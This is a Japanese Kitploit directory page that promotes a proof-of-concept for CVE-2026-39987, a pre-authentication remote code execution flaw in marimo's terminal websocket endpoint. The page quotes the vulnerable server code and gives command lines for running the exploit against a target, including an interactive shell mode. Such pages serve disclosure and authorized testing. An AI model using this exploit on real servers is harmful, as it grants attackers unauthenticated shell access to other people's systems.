Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/alreadyclosed/cve-2026-39987
ExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubalreadyclosed/cve-2026-39987

CVE-2026-39987

CVE-2026-39987 for marimo 0.20.4 PoC

リポジトリを見る
14日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-39987 Marimo 0.20.4 向け PoC

⚠️ このツールは教育目的および許可されたセキュリティテスト専用です。作成者は、不正または違法な使用について一切責任を負いません。自己責任で使用してください。 ⚠️

情報:

CVE-2026-39987 は、Marimo(0.23.0 より前のバージョン)における、認証前リモートコード実行(RCE)の重大な脆弱性です。

なぜ動作するのか:

/terminal/ws エンドポイントは認証なしで公開されています。

内部: marimo/_server/api/endpoints/terminal.py

root@kitploit:~
@router.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket) -> None:
    app_state = AppState(websocket)
    if app_state.mode != SessionMode.EDIT:
        await websocket.close(...)
        return
    if not supports_terminal():
        await websocket.close(...)
        return
    await websocket.accept()
    # further down..
    child_pid, fd = pty.fork()

見てのとおり、PTY シェルを生成する前に認証チェックは一切実行されません。

このツールの使用例:

root@kitploit:~
python3 CVE-2026-39987.py example.com -c 'whoami'

何も出力されず、ターゲットが SSL を使用している場合は、--max-wait と --any-ssl 引数を使用してください。

root@kitploit:~
python3 CVE-2026-39987.py example.com -c 'whoami' --any-ssl --max-wait 5

対話モードもあります

root@kitploit:~
python3 CVE-2026-39987.py example.com -i --any-ssl

参考:

  1. https://nvd.nist.gov/vuln/detail/CVE-2026-39987
  2. https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc
  3. https://www.cve.org/CVERecord?id=CVE-2026-39987
  4. https://github.com/marimo-team/marimo
ツールをダウンロード